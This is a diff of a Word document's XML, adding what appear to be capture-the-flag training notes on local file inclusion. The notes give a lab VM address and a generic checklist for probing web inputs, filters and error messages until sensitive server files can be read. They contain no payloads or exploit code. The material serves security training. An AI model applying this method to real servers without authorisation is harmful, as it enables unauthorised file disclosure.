+        <w:t>h-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>Challenge</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Great Job! Now apply the techniques you've learned to capture the flags! Familiarizing yourself with </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId78" w:tgtFrame="_blank" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>HTTP Web basics</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t> could help you complete these challenges.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Make sure the attached VM is up and running then visit: http://10.10.127.52/challenges/index.php</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Steps for testing for LFI</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Find an entry point that could be via GET, POST, COOKIE, or HTTP header values!</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Enter a valid input to see how the web server behaves.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Enter invalid inputs, including special characters and common file names.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Don't always trust what you supply in input forms is what you intended! Use either a browser address bar or a tool such as </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Burpsuite</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Look for errors while entering invalid input to disclose the current path of the web application; if there are no errors, then trial and error might be your best option.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Understand the input validation and if there are any filters!</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Try the inject a valid entry to read sensitive files</w:t>
+      </w:r>
+    </w:p>
     <w:p/>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
@@ -7253,6 +14812,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="0F0204C5"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="77A09D12"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="148035B1"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="F746F67C"/>
@@ -7401,7 +15073,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="23065BDF"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="9446C3C2"/>
@@ -7550,10 +15222,10 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="45F2265E"/>
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="3F561089"/>
     <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="39CE0A5A"/>
+    <w:tmpl w:val="FE3289F4"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -7699,236 +15371,10 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="50DF3CE0"/>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="45F2265E"/>
     <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="608AF318"/>
-    <w:lvl w:ilvl="0">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%1."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="720"/>
-        </w:tabs>
-        <w:ind w:left="720" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="1" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%2."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="1440"/>
-        </w:tabs>
-        <w:ind w:left="1440" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="2" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%3."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="2160"/>
-        </w:tabs>
-        <w:ind w:left="2160" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="3" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%4."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="2880"/>
-        </w:tabs>
-        <w:ind w:left="2880" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="4" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%5."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="3600"/>
-        </w:tabs>
-        <w:ind w:left="3600" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="5" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%6."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="4320"/>
-        </w:tabs>
-        <w:ind w:left="4320" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="6" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%7."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="5040"/>
-        </w:tabs>
-        <w:ind w:left="5040" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="7" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%8."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="5760"/>
-        </w:tabs>
-        <w:ind w:left="5760" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="8" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%9."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="6480"/>
-        </w:tabs>
-        <w:ind w:left="6480" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-  </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="619841C6"/>
-    <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="1CBA70CC"/>
-    <w:lvl w:ilvl="0">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%1."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="720"/>
-        </w:tabs>
-        <w:ind w:left="720" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="1" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%2."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="1440"/>
-        </w:tabs>
-        <w:ind w:left="1440" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="2" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%3."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="2160"/>
-        </w:tabs>
-        <w:ind w:left="2160" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="3" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%4."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="2880"/>
-        </w:tabs>
-        <w:ind w:left="2880" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="4" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%5."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="3600"/>
-        </w:tabs>
-        <w:ind w:left="3600" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="5" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%6."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="4320"/>
-        </w:tabs>
-        <w:ind w:left="4320" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="6" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%7."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="5040"/>
-        </w:tabs>
-        <w:ind w:left="5040" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="7" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%8."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="5760"/>
-        </w:tabs>
-        <w:ind w:left="5760" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="8" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%9."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="6480"/>
-        </w:tabs>
-        <w:ind w:left="6480" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-  </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="67916FF5"/>
-    <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="8FE0ED08"/>
+    <w:tmpl w:val="39CE0A5A"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -8074,10 +15520,236 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="50DF3CE0"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="608AF318"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="7C940C2F"/>
+    <w:nsid w:val="619841C6"/>
     <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="390044C4"/>
+    <w:tmpl w:val="1CBA70CC"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="67916FF5"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="8FE0ED08"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -8223,29 +15895,300 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="776D5C1D"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="FB5A3510"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="7C940C2F"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="390044C4"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
